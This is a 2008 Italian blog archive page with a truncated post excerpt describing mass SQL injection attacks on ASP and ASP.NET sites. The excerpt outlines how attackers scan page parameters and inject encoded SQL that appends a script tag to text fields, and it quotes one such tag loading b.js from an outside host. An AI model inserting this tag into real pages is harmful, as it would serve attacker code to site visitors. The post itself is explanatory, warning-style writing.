July 2008 Blog Posts

Sql Injection Cross Site Scripting

Problem. Ultimamente si stanno verificando attacchi massivi che bucano soprattutto i siti sviluppati con il vecchio ASP. Ma non solo, anche ASP.Net è vulnerabile ad attacchi che si verificano da qualche mese e che stanno causando grossi problemi a portali di aziende organizzazioni importanti di tutto il mondo. Questo attacco prevede: - la scansione dei parametri utilizzati nelle pagine (get e post) - la valorizzazione di tali paramentri con comandi sql scritti in codice binario - la conseguente esecuzione dei comandi sql che non fanno altro che appendere, in tutti i campi testuali, un tag html come ad esempio "<script src=http://www.pingbnr.com/b.js> </script>" L'effetto è che quando gli utenti accedono...

«July»
SunMonTueWedThuFriSat
293012345
6789101112
13141516171819
20212223242526
272829303112
3456789